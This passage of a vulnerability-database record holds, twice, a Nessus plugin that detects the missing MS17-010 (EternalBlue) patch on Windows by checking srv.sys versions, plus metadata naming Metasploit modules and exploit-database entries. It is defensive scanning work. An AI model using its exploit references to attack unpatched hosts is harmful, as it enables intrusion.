WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. 
Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", 
bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, 
rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. 
Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS: CANVAS", "Metasploit: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption"]}, "lastseen": "2021-08-11T13:59:36", "differentElements": ["vpr"], "edition": 7}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "8671e37bcd65c38f125354bed64b17e2", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. 
WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?d9f569cf", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?065561d0", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.nessus.org/u?321523eb", "https://github.com/stamparm/EternalRocks/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-12T12:17:43", "history": [], "viewCount": 2959, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "700099.PRM", "MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", 
"1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:42031"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96705", "SMNTC-96704", "SMNTC-96709", "SMNTC-96707", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": 
["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}], "modified": "2021-08-12T12:17:43", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-08-12T12:17:43", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) 
Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. 
(CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of 
patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 
2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", 
min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows 
Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. 
